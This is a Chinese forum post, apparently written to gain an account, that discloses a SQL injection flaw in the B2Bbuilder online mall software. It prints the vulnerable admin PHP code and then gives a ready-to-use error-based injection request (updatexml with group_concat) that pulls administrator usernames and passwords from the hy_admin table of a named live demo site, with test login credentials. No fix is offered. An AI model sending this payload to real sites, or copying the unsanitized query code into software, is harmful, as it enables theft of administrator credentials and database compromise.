1、申 请 I D : a630935072
2、个人邮箱:630935072@qq.com
3、原创技术文章:
好几年没上论坛了 以前的号没了 现在申请一个吧,记得那时候不用注册码的
既然要注册码了 就发表一个吧 下面文章开始吧 废话不多说
B2Bbuilder网上商城通用注入漏洞
漏洞目录: module\company\admin\business_info_list.php
<?php
$status=array('-1'=>lang_show('notpass'),'0'=>lang_show('wpass'),'1'=>lang_show('auditpass'));
if(isset($_GET['step']))
{
if($_GET['step']=="del")
{
$db->query("delete from ".CERTIFICATION." where id='$_GET[deid]'");
$sql="update ".COMPANY." set certification='0' wherecompany_id in (select company_id from ".CERTIFICATION." where id='$_GET[deid]')";
$db->query($sql);
}
}
if(isset($_POST['del']))
{
$ids=implode(",",$_POST['del']);
$sql="update ".CERTIFICATION." set statu=1 where id in($ids)";
$db->query($sql);
$sql="update ".COMPANY." set certification='1' wherecompany_id in (select company_id from ".CERTIFICATION." where id in ($ids))";
$db->query($sql);
}
?>
以上为文件源码
我们可以看到源码中 del未能过滤导致造成sql注入
那么我们怎么来操作呢?
我们就可以直接构造注入语句了
http://democn.b2b-builder.com 账号密码 test test
构造url http://democn.b2b-builder.com/main.php?m=company&s=admin/business_info_list post数据包为 del[]=1)or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,password) fromhy_admin))),0) %23&updateID=11&cc=1111
我们来观看下图 结果:
漏洞证明
|